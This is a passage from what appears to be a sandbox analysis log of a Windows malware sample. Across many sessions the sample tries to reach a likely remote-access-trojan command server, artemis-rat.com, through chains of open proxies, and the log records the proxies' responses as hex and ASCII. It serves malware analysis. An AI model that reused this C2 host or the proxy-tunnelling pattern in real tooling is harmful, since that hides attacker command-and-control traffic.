                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1392192.168.2.553789135.148.139.15110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.955616951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1393192.168.2.553629223.113.80.15890913876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.956027985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.416925907 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1394192.168.2.553680202.139.198.1530303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.958268881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108352900 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1395192.168.2.553726195.35.25.94803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.981933117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.918090105 CET805INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1396192.168.2.553753186.124.164.213803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.981935024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1397192.168.2.553773159.223.71.71603773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.984488010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1398192.168.2.55376247.106.76.19680883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.984738111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.319138050 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1399192.168.2.553379189.240.60.16990903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.985126019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.256108999 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1400192.168.2.55376337.18.73.6055663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.985318899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.331629992 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1401192.168.2.553777211.222.252.18781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.012263060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1402192.168.2.552343107.148.201.157803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.014247894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092818022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.092921972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202092886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1403192.168.2.5536933.108.115.4810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.043230057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.444669962 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1404192.168.2.553745167.172.86.46104713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.043637037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1405192.168.2.553796130.162.213.17580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.043946028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.367961884 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1406192.168.2.55377141.65.236.5719763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.050503969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092307091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
